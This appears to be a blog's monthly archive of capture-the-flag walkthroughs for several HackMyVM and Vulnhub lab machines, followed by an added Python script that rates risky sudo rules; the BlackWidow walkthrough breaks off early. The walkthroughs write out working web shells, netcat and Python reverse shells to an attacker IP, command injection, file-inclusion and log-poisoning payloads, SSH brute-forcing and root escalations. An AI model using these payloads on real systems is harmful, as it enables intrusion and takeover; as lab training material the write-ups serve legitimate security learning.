Monthly archive: May 2021

HackMyVm Momentum2 Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Momentum2

Scan ports.

 nmap -sV -sC -p- 192.168.56.99  -oN ports.log
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 15:05 CST
 Nmap scan report for localhost (192.168.56.99)
 Host is up (0.0013s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA)
 |   256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA)
 |_  256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Momentum 2 | Index
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 1428]
 /img                  (Status: 301) [Size: 314] [--> http://192.168.56.100/img/]
 /css                  (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
 /ajax.php.bak         (Status: 200) [Size: 357]
 /ajax.php             (Status: 200) [Size: 0]
 /manual               (Status: 301) [Size: 317] [--> http://192.168.56.100/manual/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]
 /dashboard.html       (Status: 200) [Size: 513]
 /owls                 (Status: 301) [Size: 315] [--> http://192.168.56.100/owls/]

Check ajax.php.bak. Uploading a php file is only allowed when the admin cookie matches, and the comments hint that the live version also expects a POST parameter secure=val1d and one more upper-case letter at the end of the cookie.

 cat ajax.php.bak
     //The boss told me to add one more Upper Case letter at the end of the cookie
     if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
         //[+] Add if $_POST['secure'] == 'val1d'
         $valid_ext = array("pdf","php","txt");
     }
     else{
         $valid_ext = array("txt");
     }
     // Remember success upload returns 1

Generate a dictionary of candidate cookies: the known value followed by one upper-case letter.

 for c in {A..Z}; do echo '&G6u@B6uDXMq&Ms'$c >> cookie.txt; done

Create cmd.php with a one-line PHP shell in it.

 cat cmd.php
 <?php
 system($_GET["cmd"])
 ?>

Go to /dashboard.html, choose cmd.php, click upload, and capture the request with Burp Suite.

[image-20210531210127178.png]

Send the request to Repeater, add the cookie "admin=xxx" (we will brute-force the value next) and the POST parameter "secure=val1d". Note that the value is "val1d" with a digit one, not "valid". If we click send now, the response is 0, which means the upload failed.

[image-20210531212540903.png]

Then send it to Intruder and mark the cookie value as the payload position: admin=§xxxxx§.

[image-20210531213130392.png]

Set the payload list to the cookie.txt we just generated.

[image-20210531213158667.png]

Click Start attack. The request that returns 1 reveals the right cookie.

[image-20210531213313743.png]

cmd.php has now been uploaded to /owls.

[image-20210531213353093.png]

Check that cmd.php works.

 curl 'http://192.168.56.99/owls/cmd.php?cmd=id'
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now we can get a reverse shell.

 curl 'http://192.168.56.99/owls/cmd.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash'
 -------------------------------------------------------------------------------------------------------
 nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:37994.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

In athena's home folder we find a password hint.

 www-data@momentum2:/home/athena$ cat password-reminder.txt
 cat password-reminder.txt
 password : myvulnerableapp[Asterisk]

The asterisk mark (*) stands for one unknown character, so we generate a dictionary with crunch, covering each character class in turn (@ lower case, , upper case, % digits, ^ symbols).

```
crunch 16 16 -t myvulnerableapp@ > dic.txt
crunch 16 16 -t myvulnerableapp% >> dic.txt
crunch 16 16 -t myvulnerableapp, >> dic.txt
crunch 16 16 -t myvulnerableapp^ >> dic.txt
```

Brute-force ssh with the user name athena and this dictionary.

hydra -l athena -P dic.txt 192.168.56.99 ssh -f
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-31 15:26:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
[DATA] attacking ssh://192.168.56.99:22/
[22][ssh] host: 192.168.56.99 login: athena password: myvulnerableapp*


SSH in as athena and check sudo.

athena@momentum2:~$ sudo -l
Matching Defaults entries for athena on momentum2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User athena may run the following commands on momentum2:
(root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py


Run the script with sudo; when it asks for the seed, enter a reverse shell command as the seed.

sudo python3 /home/team-tasks/cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : ;nc 192.168.56.150 1234 -e /bin/sh;


In another terminal, listen on the port given above, and we get a root shell.

nc -nvlp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:37992.
id
uid=0(root) gid=0(root) groups=0(root)

HackMyVm Hidden Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hidden

Scan ports.

 nmap -sV -sC -p- 192.168.56.99  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 b8:10:9f:60:e6:2b:62:cb:3a:8c:8c:60:4b:1d:99:b9 (RSA)
 |   256 64:b5:b8:e6:0f:79:23:4d:4a:c0:9b:0f:a7:75:67:c9 (ECDSA)
 |_  256 d1:11:e4:07:8a:fe:06:72:64:62:28:ca:e3:29:7b:a0 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Level 1
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 cat 80.log
 /index.html           (Status: 200) [Size: 392]

Check index.html; we find a png file and a hint in an HTML comment.

[image-20210531194036612.png]

     <body>
         <h1><center>Welcome to level 1</center></h1>
          <center><img src="decodethis_pls.png"></center>
     </body>
     <!-- format xxx.xxxxxx.xxx -->

The png is a tic-tac-toe (pigpen) cipher. Decode it online.

[image-20210531174854759.png]

Add sys.hidden.hmv to /etc/hosts and scan port 80 again.

 gobuster dir -u http://sys.hidden.hmv -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o sys.hidden.hmv.log
 ...
 /users                (Status: 301) [Size: 316] [--> http://sys.hidden.hmv/users/]
 /members              (Status: 301) [Size: 318] [--> http://sys.hidden.hmv/members/]
 /index.html           (Status: 200) [Size: 282]
 /weapon               (Status: 301) [Size: 317] [--> http://sys.hidden.hmv/weapon/]

Scan /weapon.

 gobuster dir -u http://sys.hidden.hmv/weapon -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o weapon.log
 ...
 /index.html           (Status: 200) [Size: 0]
 /loot.php             (Status: 200) [Size: 0]

Fuzz loot.php for a parameter name.

 wfuzz -u 'http://sys.hidden.hmv/weapon/loot.php?FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
  ...
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload                                  
 =====================================================================
 000008724:   200        1 L      3 W        54 Ch       "hack"  

Confirm RCE.

 curl 'http://sys.hidden.hmv/weapon/loot.php?hack=id'
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Get a reverse shell as www-data.

curl 'http://sys.hidden.hmv/weapon/loot.php?hack=nc%20192.168.56.150%201234%20-e%20/bin/bash'

 nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:39104.
 python3 -c 'import pty;pty.spawn("/bin/bash")'
 www-data@hidden:/var/www/hidden/weapon$

Check sudo.

 www-data@hidden:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on hidden:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on hidden:
     (toreto) NOPASSWD: /usr/bin/perl

Get a shell as toreto.

 www-data@hidden:/home/toreto$ sudo -u toreto perl -e 'exec "/bin/bash";'
 sudo -u toreto perl -e 'exec "/bin/bash";'
 toreto@hidden:~$ id
 id
 uid=1001(toreto) gid=1000(toreto) groups=1000(toreto)

Upload id_rsa.pub to /home/toreto/.ssh as authorized_keys and chmod it to 600.

```
toreto@hidden:~$ pwd
pwd
/home/toreto
toreto@hidden:~$ mkdir .ssh
mkdir .ssh
toreto@hidden:~$ cd .ssh
cd .ssh
toreto@hidden:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
<http://192.168.56.150/id_rsa.pub -O authorized_keys
--2021-05-31 04:46:26-- http://192.168.56.150/id_rsa.pub
Connecting to 192.168.56.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [application/x-mspublisher]
Saving to: ‘authorized_keys’
authorized_keys 100%[===================>] 565 --.-KB/s in 0s
2021-05-31 04:46:26 (9.01 MB/s) - ‘authorized_keys’ saved [565/565]
toreto@hidden:~/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keys
```

Then log in over ssh as toreto.

ssh toreto@192.168.56.99
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hidden 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

[ASCII-art banner: Hack_MyVM - Hidden]

Congratulations!!! you have reached the last level!
Good Luck! 😉

Last login: Mon May 31 04:47:11 2021 from 192.168.56.150
toreto@hidden:~$


In /home/atenea/.hidden we find a wordlist.

toreto@hidden:/home/atenea$ cd .hidden/
toreto@hidden:/home/atenea/.hidden$ ls -la
total 16
drwxr-xr-x 2 atenea atenea 4096 May 22 19:17 .
drwxr-xr-x 4 atenea atenea 4096 May 31 04:53 ..
-rw------- 1 toreto toreto 6170 May 22 19:11 atenea.txt


Brute-force atenea's password with it.

hydra -l atenea -P atenea.txt 192.168.56.99 ssh -f
...
[STATUS] 161.00 tries/min, 161 tries in 00:01h, 401 to do in 00:03h, 16 active
[STATUS] 112.67 tries/min, 338 tries in 00:03h, 225 to do in 00:02h, 16 active
[22][ssh] host: 192.168.56.99 login: atenea password: sys8423hmv

Log in as atenea and check sudo.

atenea@hidden:~$ sudo -l
Matching Defaults entries for atenea on hidden:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User atenea may run the following commands on hidden:
(root) NOPASSWD: /usr/bin/socat


Get a root shell using socat.

atenea@hidden:~$ sudo socat stdin exec:/bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
hidden

Vulnhub Prime (2021): 2 Walkthrough

https://www.vulnhub.com/entry/prime-2021-2,696/

Scan ports.

# Nmap 7.91 scan initiated Wed May 12 17:59:43 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.33.139
 Nmap scan report for 192.168.33.139 (192.168.33.139)
 Host is up (0.0041s latency).
 Not shown: 65530 closed ports
 PORT      STATE SERVICE     VERSION
 22/tcp    open  ssh         OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
 |   256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
 |_  256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
 80/tcp    open  http        Apache httpd 2.4.46 ((Ubuntu))
 |_http-server-header: Apache/2.4.46 (Ubuntu)
 |_http-title: HackerCTF
 139/tcp   open  netbios-ssn Samba smbd 4.6.2
 445/tcp   open  netbios-ssn Samba smbd 4.6.2
 10123/tcp open  http        SimpleHTTPServer 0.6 (Python 3.9.4)
 |_http-server-header: SimpleHTTP/0.6 Python/3.9.4
 |_http-title: Directory listing for /
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 Host script results:
 |_clock-skew: 7h59m59s
 |_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode:
 |   2.02:
 |_    Message signing enabled but not required
 | smb2-time:
 |   date: 2021-05-12T18:00:05
 |_  start_date: N/A

List the SMB shares.

 smbclient -L 192.168.33.139
 Enter WORKGROUP\kali's password:

         Sharename       Type      Comment
         ---------       ----      -------
         print$          Disk      Printer Drivers
         welcome         Disk      Welcome to Hackerctf LAB
         IPC$            IPC       IPC Service (hackerctflab server (Samba, Ubuntu))
 SMB1 disabled -- no workgroup available

In the welcome share we find shell.php under upload/.

```
smbclient '\\192.168.33.139\welcome'
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 13 04:27:52 2021
.. D 0 Sat May 8 02:38:58 2021
.mysql_history H 18 Sat May 8 15:05:03 2021
.ssh DH 0 Thu May 13 04:29:18 2021
.profile H 807 Sat Mar 20 00:02:58 2021
upload D 0 Sun May 9 19:19:02 2021
.sudo_as_admin_successful H 0 Sat May 8 13:34:48 2021
.bash_logout H 220 Sat Mar 20 00:02:58 2021
.cache DH 0 Sat May 8 02:39:15 2021
something N 82 Sat May 8 00:18:09 2021
secrets N 0 Sat May 8 00:15:17 2021
.bash_history H 72 Sun May 9 19:23:26 2021
.bashrc H 3771 Sat Mar 20 00:02:58 2021

             19475088 blocks of size 1024. 9885876 blocks available

smb: \> cd upload
smb: \upload\> dir
. D 0 Sun May 9 19:19:02 2021
.. D 0 Thu May 13 04:27:52 2021
shell.php A 35 Sun May 9 19:19:02 2021

             19475088 blocks of size 1024. 9885872 blocks available

smb: \upload\> get shell.php
getting file \upload\shell.php of size 35 as shell.php (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
smb: \upload\>
```

Check shell.php.

cat shell.php
<?php echo system($_GET['cmd']);?>


The file something reveals the user name jarves.

cat something
I wanted to make it my home directory. But idea must be changed.

Thanks,
jarves


Directory scan of port 80.

cat 80.log
/css (Status: 301) [Size: 314] [--> http://192.168.33.139/css/]
/server (Status: 301) [Size: 317] [--> http://192.168.33.139/server/]
/wp (Status: 301) [Size: 313] [--> http://192.168.33.139/wp/]
/index.html (Status: 200) [Size: 5761]
/images (Status: 301) [Size: 317] [--> http://192.168.33.139/images/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.139/javascript/]


Check the WordPress install with wpscan; it finds one user and one vulnerable plugin.

wpscan --url http://192.168.33.139/wp/ -e u,ap --no-banner --api-token yourtoken --force --plugins-detection aggressive
...
[+] gracemedia-media-player
 | Location: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2013-07-21T15:09:00.000Z
 | Readme: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/, status: 200
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
 |      - https://www.exploit-db.com/exploits/46537/
 |      - https://seclists.org/fulldisclosure/2019/Mar/26
...
[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)


The plugin has an LFI vulnerability (CVE-2019-9618).

searchsploit gracemedia
-------------------------------------------------------------------------------- ----------------------
 Exploit Title                                                                  | Path
-------------------------------------------------------------------------------- ----------------------
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion             | php/webapps/46537.txt
-------------------------------------------------------------------------------- ----------------------


Check if LFI works.

curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
...


Include the uploaded shell.php through the LFI and pass cmd=id.

curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Visit the following address to run a python reverse shell through the included shell.php.

http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.33.128%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27


Catch the reverse shell.

nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.33.139.
Ncat: Connection from 192.168.33.139:49084.
bash: cannot set terminal process group (971): Inappropriate ioctl for device
bash: no job control in this shell
<t/plugins/gracemedia-media-player/templates/files$

<t/plugins/gracemedia-media-player/templates/files$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Another way to get an ssh login as jarves directly is to upload authorized_keys through SMB, since the welcome share is jarves's home directory.

smbclient '\\192.168.33.139\welcome'
...
smb: \> mkdir .ssh
smb: \> cd .ssh
smb: .ssh\> put authorized_keys
putting file authorized_keys as .ssh\authorized_keys (183.9 kb/s) (average 183.9 kb/s)
smb: .ssh\> chmod 600 authorized_keys
Server doesn't support UNIX CIFS calls.


Check jarves's groups.

jarves@hackerctflab:~$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)


jarves is in the lxd group, so we use the classic lxd privilege escalation.

lxc image import ./alpine-v3.13-x86_64-20210405_2328.tar.gz --alias myimage
lxd init alpine:v3.12 mypool
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite


Now we are root inside the container, with the host filesystem mounted at /mnt/root.

jarves@hackerctflab:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)


Put authorized_keys in /root/.ssh and we can ssh in as root directly.

ssh root@192.168.33.139
...
root@hackerctflab:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
hackerctflab

HackMyVm Broken Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Broken

Scan ports.

 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 1b:8d:f3:e3:56:64:af:54:df:10:f8:39:ac:ad:c9:2f (RSA)
 |   256 77:c1:f3:e4:6b:96:0f:1e:5c:24:2e:4d:3e:4a:09:80 (ECDSA)
 |_  256 88:05:ef:7a:04:56:f0:59:62:a5:f8:40:32:24:8a:17 (ED25519)
 80/tcp open  http    nginx 1.14.2
 | http-robots.txt: 1 disallowed entry
 |_/textpattern
 |_http-server-header: nginx/1.14.2
 |_http-title: Site doesn't have a title (text/html).

Scan port 80.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ...
 /index.html           (Status: 200) [Size: 3]
 /file.php             (Status: 200) [Size: 0]
 /robots.txt           (Status: 200) [Size: 23]

robots.txt tells us there is a Textpattern CMS.

 cat robots.txt  
 Disallow: /textpattern

Fuzz file.php for an LFI parameter name.

 wfuzz -u 'http://broken/file.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000007535:   200        27 L     40 W       1451 Ch     "file"

Read /etc/passwd.

 curl 'http://broken/file.php?file=../../../../etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 heart:x:1000:1000:heart,,,:/home/heart:/bin/bash
 ...

Write PHP into the nginx access log through the User-Agent string (log poisoning).

 curl 'http://broken' -A '<?php system($_GET[c]); ?>'  
 :(

Check that the injected PHP executes when the log is included.

 curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=id'
 ...
 192.168.56.150 - - [26/May/2021:22:44:55 -0400] "GET / HTTP/1.1" 200 3 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)

Then use it to get a reverse shell.

 curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=nc%20192.168.56.150%201234%20-e%20/bin/bash'

In another terminal, listen on the port and catch the shell.

 nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:50004.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Check sudo.

 www-data@broken:~/html/textpattern/textpattern$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on broken:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on broken:
     (heart) NOPASSWD: /usr/bin/pydoc3.7

Run pydoc3.7 as heart and escape from the pager to a shell.

 www-data@broken:/home/heart$ sudo -u heart /usr/bin/pydoc3.7 os
 ...
 :!/bin/sh
 ...
 $ id
 id
 uid=1000(heart) gid=1000(heart) groups=1000(heart),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
 $ pwd
 pwd
 /home/heart
 $

Check sudo again.

 heart@broken:~$ sudo -l
 Matching Defaults entries for heart on broken:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User heart may run the following commands on broken:
     (ALL) NOPASSWD: /usr/bin/patch
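
The sudo -l listings on this page (cookie-gen.py under python3, perl, socat, pydoc3.7 and now patch) are variations of one misconfiguration: a NOPASSWD rule on a program that can run arbitrary code or write arbitrary files as the RunAs user. As an added example that is not part of the original walkthroughs, the following Python script parses sudo -l output in the Debian/Ubuntu layout shown above and rates each rule; the risky-binary list and the sample output are constructed for this example.

```python
import os
import re

# Programs whose sudo rule is effectively "run anything as the RunAs user".
# Limited to the binaries granted in the walkthroughs above; extend as needed.
RISKY = {
    'python': 'general-purpose interpreter: runs arbitrary code as the RunAs user',
    'perl':   'general-purpose interpreter: runs arbitrary code as the RunAs user',
    'socat':  'can exec an interactive process as the RunAs user',
    'pydoc':  'shows help through a pager that permits shell escapes',
    'patch':  'applies caller-supplied diffs to any file the RunAs user can write (e.g. /etc/passwd)',
}

RULE_LINE = re.compile(r'^\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$')   # "(root) NOPASSWD: /usr/bin/perl"
TAG = re.compile(r'^([A-Z]+):\s*')                                  # "NOPASSWD:", "SETENV:", ...


def parse_sudo_l(text):
    """Parse the rule section of `sudo -l` output into a list of rule dicts."""
    rules = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if not in_rules:
            in_rules = 'may run the following commands' in line
            continue
        m = RULE_LINE.match(line)
        if not m:
            continue
        runas = m.group('runas').split(':')[0].strip()   # "(ALL : ALL)" -> "ALL"
        tags = set()
        for segment in m.group('rest').split(','):
            segment = segment.strip()
            # A tag applies to this and every following command on the line until changed.
            while (t := TAG.match(segment)):
                tag = t.group(1)
                if tag == 'NOPASSWD':
                    tags.discard('PASSWD')
                elif tag == 'PASSWD':
                    tags.discard('NOPASSWD')
                tags.add(tag)
                segment = segment[t.end():]
            if segment:
                rules.append({'runas': runas, 'nopasswd': 'NOPASSWD' in tags, 'command': segment})
    return rules


def assess(rule):
    """Return (severity, reason) for one rule, or None when it looks harmless."""
    command = rule['command']
    if command == 'ALL':
        return ('critical', 'any command')
    argv = command.split()
    # /usr/bin/python3 -> python, /usr/bin/pydoc3.7 -> pydoc
    base = re.sub(r'[\d.]+$', '', os.path.basename(argv[0]))
    reason = RISKY.get(base)
    if reason is None:
        return None
    if len(argv) > 1 and base in ('python', 'perl'):
        # A fixed script argument narrows the rule; the script's own input handling
        # then decides (cookie-gen.py above handed its seed to a shell).
        return ('medium', f'fixed script {argv[1]}: review how it handles user input')
    return ('high', reason)


def audit(text):
    """Run assess() over every parsed rule and return the findings in listing order."""
    findings = []
    for rule in parse_sudo_l(text):
        verdict = assess(rule)
        if verdict:
            severity, reason = verdict
            findings.append({**rule, 'severity': severity, 'reason': reason})
    return findings


# Constructed `sudo -l` output gathering the rules seen on the machines above (not a real capture).
SAMPLE_SUDO_L = """\
Matching Defaults entries for audit on lab:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User audit may run the following commands on lab:
    (root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py
    (toreto) NOPASSWD: /usr/bin/perl
    (root) NOPASSWD: /usr/bin/socat
    (heart) NOPASSWD: /usr/bin/pydoc3.7
    (ALL) NOPASSWD: /usr/bin/patch
    (root) /usr/bin/systemctl restart nginx
"""

if __name__ == '__main__':
    for f in audit(SAMPLE_SUDO_L):
        pw = 'NOPASSWD' if f['nopasswd'] else 'PASSWD'
        print(f"[{f['severity']:<8}] ({f['runas']}) {pw}: {f['command']}  <- {f['reason']}")
```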

Use patch to add a new user root2 with uid 0 (root privileges) to /etc/passwd.

 heart@broken:~$ cp /etc/passwd ./passwd_new
 heart@broken:~$ openssl passwd mypass
 qQdUCJYw6ARL6
 heart@broken:~$ echo 'root2:qQdUCJYw6ARL6:0:0:root:/root:/bin/bash' >> passwd_new
 heart@broken:~$ diff -u /etc/passwd ./passwd_new > passwd_patch
 heart@broken:~$ sudo patch -i ./passwd_patch /etc/passwd
 patching file /etc/passwd
 heart@broken:~$ su root2
 Password:
 root@broken:/home/heart# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 broken
 root@broken:/home/heart# 

HackMyVm BlackWidow Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=BlackWidow

Scan ports with nmap.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100

 Nmap scan report for 192.168.56.100 (192.168.56.100)                                                                  
 Host is up (0.0024s latency).
 Not shown: 65526 closed ports
 PORT      STATE SERVICE    VERSION
 22/tcp    open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 ...
 80/tcp    open  http       Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 111/tcp   open  rpcbind    2-4 (RPC #100000)
 ...
 2049/tcp  open  nfs_acl    3 (RPC #100227)
 3128/tcp  open  http-proxy Squid http proxy 4.6
 |_http-server-header: squid/4.6
 |_http-title: ERROR: The requested URL could not be retrieved
 38425/tcp open  mountd     1-3 (RPC #100005)
 41727/tcp open  mountd     1-3 (RPC #100005)
 43429/tcp open  nlockmgr   1-4 (RPC #100021)
 55311/tcp open  mountd     1-3 (RPC #100005)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check port 80.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 84]
 /docs                 (Status: 301) [Size: 315] [--> http://192.168.56.100/docs/]
 /company              (Status: 301) [Size: 318] [--> http://192.168.56.100/company/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]

Check /company; we find started.php.

 gobuster dir -u http://192.168.56.100/company -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80_company.log
